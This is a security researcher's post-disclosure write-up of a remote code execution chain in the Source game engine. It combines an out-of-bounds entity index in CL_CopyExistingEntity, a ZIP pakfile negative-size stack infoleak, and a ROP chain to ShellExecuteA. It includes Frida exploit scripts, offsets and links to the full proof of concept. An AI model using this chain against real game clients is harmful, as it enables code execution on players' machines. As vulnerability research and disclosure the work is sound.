One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into, in this case hl2.exe, and injects the “server” (known as a Gadget) that will talk back and forth with the “client”. The “server”, executing inside the game, creates a rich Javascript environment with special bindings to read/write memory and hook code. To know more about how this works, check out the Frida Docs.

After getting that simple client and server set up for Frida, I created a Typescript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that very often the engine objects take advantage of C++ polymorphism which expose their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual Typescript objects to call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)
    return;
}

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the Typescript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilized the ret-sync project to communicate with a loaded copy of IDA at runtime. What this let me do is assign names to functions inside of my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to get their address. The intent was to make the exploit scripts much more stable between game binary updates (which happen every few days for games like CS:GO).

Here’s an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll the current process, hooks it, and then does some functionality with some engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.
        Thread.sleep(1)

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")
            return;
        }
        [...]
    }
})

Now, if the game updates, this script will still function so long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported over between engine updates using BinDiff automagically, making it easy to automatically port offsets as the game updates!

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to follow, and will continue to use it with any more Source adventures in the foreseeable future. I encourage readers with backgrounds with pwntools and CTFing to consider trying out Frida against desktop binaries. I gained a lot from learning it, and I feel like the desktop reversing/VR/exploitation community should really look to adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There’s a lot of bugs in Source. It’s a very buggy engine. But not all bugs are made equal, and only some bugs are worth attempting to chain together. The easy type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing for as long as you have a silly string bug affecting the stack.

In CS:GO, the classic method of exploiting these type of bugs is to exploit some buffer overflow, build a ROP using the module xinput.dll which has ASLR marked as disabled, and execute shellcode on that alone. In Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find these on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address. In fact, xinput.dll can actually be relocated to other addresses just fine, and sometimes can be found at different addresses depending on if another module’s load conflicts with the address xinput.dll asks to be loaded at. Basically this means that, due to the way xinput.dll asks to be loaded, the system will choose not to randomize its base address, making it inherently defeat ASLR as you always know generally where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest form of ASLR defeat in the engine. Valve doesn’t seem to concerned by this, as its been exploited over and over again over the years. Surprisingly though, in TF2, there is no xinput.dll to utilize for ASLR defeat. This actually makes TF2, which runs on the older Source engine version, significantly harder to exploit than CS:GO, their flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice I feel.

In the case of a server->client exploit, one of these exploits would typically look like:

Client connects to server
Server exploits stack-based buffer overflow in the client
Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means that you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is just due to the general architecture of the networking of the engine, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values that are controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being given back to the caller, unlike your typical system malloc implementation. Any uninitialized heap memory is unfortunately not a valid target for an infoleak.

An option to getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

Arbitrary relative pointer writes to pointers in global queryable objects
Heap overflows against a queryable object to cause controllable pointer writes
Use-after-free with a queryable object

Heap exploits are cool to write, but often their stability can be difficult to achieve due to the vast number of heap allocations happening at any given time. This makes carving out areas of heap memory for your exploit require careful consideration for specifically sized holes of memory and the timing at which these holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities on the Source engine, but I will note that, due to its custom allocator, the allocations are much more predictable than the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that, whatever you corrupt for your information leak, you need to ensure that it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The string that is sent back is the value of either the integer value of the CVar, or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
The exploit must produce its own pointer leak, or chain another bug to infoleak
The exploit must work in all Source 1 games (TF2, CS:GO, L4D:2, etc.) and not require any special configuration of the client
The exploit must have a ~100% stability rate
The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs. Most of these were because they were trivial stack-based buffer overflows, or present in only one game but not the other.

Here’s what I eventually settled on for my chain:

Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
{
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
    {
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );
        return;
    }

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream
    pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
{
	Assert( entnum >= 0 );
	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;
}

As we see here, these Assert statements would typically check to make sure that this value is sane, and crash the game if they weren’t. But, this is not what happens in practice. In release builds of the game, all Assert statements are not compiled into the game. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo exists inside of a globally defined structure entitylist inside of client.dll. This object holds the client’s central store of all data related to game entities. This means that m_EntityCacheInfo since is at a static global offset, this allows us to calculate the proper values of entnum for our exploit easily by locating the offset of m_EntityCacheInfo in any given version of client.dll and calculating a proper value of entnum to create our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
{
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit
};

All together, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable as long as it is aligned to an 8 byte boundary (as sizeof(m_EntityCacheInfo) == 8). This is important for finding future exploit chaining.

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:

pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:

Notice call dword ptr [eax+24]. This implies that the vtable index is at 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const cha *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]

In this bug, we’re targeting m_pszString so that our crafted pointer lands directly on m_pszString. When the bug calls our function, it will believe that &m_pszString is the location of the object’s pointer, and m_pszString will contain its vtable pointer. The engine will now believe that any value inside of m_pszString for the ConVar will be part of the object’s structure. Then, it will call a function pointer at *((*m_pszString)+0x1C). As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the vtable pointer to the right place, this will give us control over the instruction pointer!

m_pszString is at offset 0x1C in the above ConVar structure, but the terms of our vulnerability requires that this pointer be aligned to an 8 byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated so that we can align m_pszString to correctly to return it to GetClientNetworkable.

This can be seen by what GetClientNetworkable looks like in x64dbg:

In the above, the pointer we can return is controlled as such:

ecx+eax*8+28 where ecx is entitylist, eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. Here it exists at 0x10C6B788 in client.dll:

This means to calculate the value of m_pszString, we add 0x1A to get 0x10C6B788 + 0x1C = 0x10C6b7A4. In this build, entitylist is at an aligned offset of 4 (0xC580B4). So, now we can calculate if this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8
4

This might look wrong, but entitylist is actually aligned to a 0x04 boundary, so that will add an extra 0x04 to the above alignment, making this value successfully align to 0x08!

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.

In summary, this is the path the code above will take:

Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
The code dereferences the first value inside of m_pszString to get the pointer to the vtable
The code offsets the vtable to index 6 and calls the first function there. We need to make sure we point this to a place we control, otherwise we would only be controlling the vtable pointer and not the actual function address in the table.

But where are we going to point the vtable? Well, we don’t need much, just a location of a known place the server can control so we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
{
	VPROF( "NET_Tick::ReadFromBuffer" );

	m_nTick = buffer.ReadLong();
#if PROTOCOL_VERSION > 10
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
#endif
	return !buffer.IsOverflowed();
}

As you might see, m_nTick is controlled by the contents of the NET_Tick packet directly. This means we can assign this to an arbitrary 32-bit value. It just so happens that this value is stored at a global as well! After some scripting up in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:

The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)
    bf.WriteLong(value.toInt32())

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);
}

Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?
    bf.WriteBit(0)

    // Baseline?
    bf.WriteBit(0)

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?
    bf.WriteBit(0)

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag
    bf.WriteBit(0)

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
}

Now we’ve got the following modified chain:

Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA)

0x26DA was calculated above to be the necessary entnum value to cause the out-of-bounds and align us to sv_mumble_positionalaudio->m_pszString.

Finally, we can see the results of our efforts:

As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can be easily found using the Ropper project. After finding an appropriate pivot, we now can begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done is with relative offsets, but now we don’t even know where to point the value of 0x41414141 to on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my arbitrary constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

Leaking uninitialized stack memory using a tricky ZIP file bug

After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

Servers can cause the client to upload arbitrary files with certain file extensions
Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
When the map has a pakfile, the engine adds the zip file as sort of a “virtual overlay” on the regular filesystem the game uses to read/write files. This means that, in any file accesses the game makes, it will check the map’s pakfile to see if it can read it from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function which is responsible for determining how large the file is that is going to be uploaded to the server, and if it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
{
    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;
}

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:

Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.

So, maybe you have noticed where we’re going. int totalBytes is a signed integer, and the comparison for whether a file is too large is determined by a signed comparison. What happens when totalBytes is negative? That makes it fully pass the length check.

If we are able to hack a file into the ZIP structure with a negative length, the engine will now happily upload to the server.

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );
g_pFileSystem->Read( tmpbuf, length, data->file );
buf.WriteBytes( tmpbuf, length );

A stack buffer of size 0x100 is used to read contents of the file in 0x100 sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading out the data to a temporary buffer on stack. The subchannel believes this file to be very large (as the subchannel interprets the size as an unsigned integer). The networking code will indefinitely send chunks to the server by allocating 0x100 of stack space and calling ->Read(). But, when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing out any data to the stack as there is no data left to read. Rather than failing out of this function, the return value of ->Read() is ignored and the data is sent Anyway. Because the stack’s contents are not cleared with each iteration, 0x100 bytes of uninitialized stack data are sent to the server constantly. The client’s subchannel will continue to send fragments indefinitely as the “file size” is too large to ever be sent successfully.

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:

Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:

This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:

Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{0....p.h@...
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

97 27 b3 7b
0a a4 bc 7b
05 b9 00 7c
05 b8 00 7c

The offsets of these pointer values in the 0x100 byte buffer are not always at the same place. Some heuristics definitely go a long way here. A simple mapping of DWORD values inside the buffer over time can show that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to get it controlled to leak a known pointer value with ~100% certainty.

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
[...]
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values had a lower WORD offset that made sense (0xE4) therefore it was easily selectable from the list of DWORDS. After leaking this pointer, I traced it back in IDA to a return location for the upper stack frame of this function, which makes total sense. I gave it a label Engine_Leak2 in IDA, which could be loaded directly from my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;
    }

    console.log("[*] Got it!")
    return leakedBase;
}

The Final Chain + RCE!

After successfully developing the infoleak, now we have both a pointer leak and an arbitrary execute bug. These two are sufficient enough for us to craft a ROP chain and pop that sweet sweet calculator. The nice part about Frida being a Python module at its core is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.
Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length
The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.
The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.
The server script builds a fake vtable pointer on the target client instance by replicating a ConVar onto the client. This is used to build a fake vtable on the client with a pointer to the fake vtable in a known location (the global ConVar). The PoC replicates the fake vtable onto sv_mumble_positionalaudio which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used for later exploitation steps.
The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.
The script again replicates the ConVar sv_downloadurl onto the client instance with the value of C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll so the pointer sv_download_url->m_pszString is now at an attacker known location.
The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker controlled location within engine.dll.
Now, the next bug will be used by creating a specially crafted SVC_PacketEntities netmessage which will call CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value will exploit the array overrun in GetClientNetworkable inside of client.dll and allows us to confuse the pointer return value to instead be a pointer to sv_mumble_positionalaudio->m_pszString (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 4. This object pointer will redirect execution by pretending to be an IClientNetworkable* object and redirect the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 7.
Lastly, to execute the ROP chain and achieve RCE, the g_ClientGlobalVariables->tickcount is pointed to a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 4. The ROP chain then begins execution. The chain will load necessary arguments to call ShellExecuteA, then execute whatever program path we replicated onto sv_downloadurl given in Step 6. In this case, it is used to execute winver.exe for proof of concept. This chain can execute any code of the attacker’s choosing, and has full permissions to access all of the users files and data.

And there you have it. This entire exploitation happens automatically, and does so by using Frida to inject into the dedicated server process to instrument to do all of the steps above. This is quite involved, but the result is pretty awesome! Here’s a video of the full PoC in action, be sure to full screen it so it’s easier to see:

Disclosure Timeline

[2020-05-13] Reported to Valve through HackerOne
[2020-05-18] Bug triaged
[2021-04-28] Notification that the bugs were fixed in Beta
[2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

https://github.com/Gbps/sourceengine-packetentities-rce-poc

For the Frida exploit chain: https://github.com/Gbps/sourceengine-packetentities-rce-poc/tree/master/src/agent

But sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off-and-on. I have also been writing a fairly large project which implements a CS:GO client from scratch in Rust to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this, it is entirely command line based.

In addition, I’ve started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and its networking protocol it uses is magnitudes more complex than that of Source. There hasn’t been too much research done in the public on Steam’s networking protocols, so I’ve written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam running creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

